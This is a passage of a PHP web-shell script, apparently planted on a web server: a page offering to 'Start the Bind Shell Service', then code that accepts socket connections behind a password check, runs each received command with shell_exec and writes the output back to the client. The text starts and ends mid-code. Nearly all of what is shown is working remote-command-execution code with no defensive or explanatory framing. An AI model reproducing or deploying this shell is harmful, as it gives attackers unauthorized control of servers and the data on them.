Fill in the form Below to Start the Bind Shell Service
“; $maxCmdLen = 31337; socket_write($client,$commandPrompt); $cmd = socket_read($client,$maxCmdLen); if($cmd == FALSE) { echo “The client Closed the conection!”; break; } socket_write($client , shell_exec($cmd)); } } else { echo “Wrong Password!”; socket_write($client, “Wrong Password , Please try again \n\n”); } socket_shutdown($client, 2); socket_close($socket); } else { echo “Socket Conections not Allowed/Supported by the server!Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!